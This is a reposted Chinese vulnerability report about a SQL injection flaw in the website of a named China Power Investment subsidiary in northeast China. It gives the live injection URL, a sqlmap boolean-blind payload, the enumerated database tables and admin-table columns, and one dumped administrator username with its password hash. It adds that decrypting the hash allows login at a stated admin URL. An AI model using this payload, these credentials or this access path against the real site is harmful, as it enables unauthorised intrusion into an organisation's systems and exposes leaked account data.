欢迎您访问程序员文章站本站旨在为大家提供分享程序员计算机编程知识!
您现在的位置是: 首页  >  网络运营

中国电力投资集团某子公司存在SQL注入漏洞

程序员文章站 2022-05-09 20:52:26
中电投东北公司存在SQL注入漏洞 电投东北电力有限公司,简称中电投东北公司,前身为中电投东北分公司,是国家电力*改革后,中国电力投资集团公司于2003年6月在东北区域成立的分公...

中电投东北公司存在SQL注入漏洞

电投东北电力有限公司,简称中电投东北公司,前身为中电投东北分公司,是国家电力*改革后,中国电力投资集团公司于2003年6月在东北区域成立的分公司。


注入点:https://www.zdtdb.com/news_view.asp?id=3289&classid=2
 

sqlmap resumed the following injection point(s) from stored session:
---
Parameter: classid (GET)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (Microsoft Access comment)
    Payload: id=3289&classid=-7786 OR 7490=7490%16
---
web server operating system: Windows 2003 or XP
web application technology: Microsoft IIS 6.0, ASP
back-end DBMS: Microsoft Access
Database: Microsoft_Access_masterdb
[19 tables]
+-------------------------------+
| admin                         |
| counter                       |
| currency                      |
| general                       |
| image                         |
| index                         |
| links                         |
| object                        |
| password                      |
| power                         |
| proc                          |
| role                          |
| sga_xplan_tpl_v$sql           |
| sga

_xplan_tpl_v$sql_plan |

| sga_xplan_tpl_v$sql_plan_sall |

| sga_xplan_tpl_v$sql_plan_stat |

| sga_xplan_tpl_v$sqltext_nl |

| text |

| videos |

+-------------------------------+




管理员表:
 

Table: admin
[6 columns]
+------------+-------------+
| Column     | Type        |
+------------+-------------+
| cvvnumber] | numeric     |
| classid    | numeric     |
| id         | numeric     |
| password   | non-numeric |
| top        | numeric     |
| username   | non-numeric |
+------------+-------------+

Database: Microsoft_Access_masterdb
Table: admin
[31 entries]
+----+---------+-----+------------+------------------+-------------------+
| id | classid | top | username   | password         | cvvnumber]        |
+----+---------+-----+------------+------------------+-------------------+
| 1  | 7?      |  | admin      | 07d350a696c5bb09 | \x07\\?ff\\?f2    |



管理员信息只贴出来一条,解密即可登录后台

https://www.zdtdb.com/admin/admin_admin.asp
 

中国电力投资集团某子公司存在SQL注入漏洞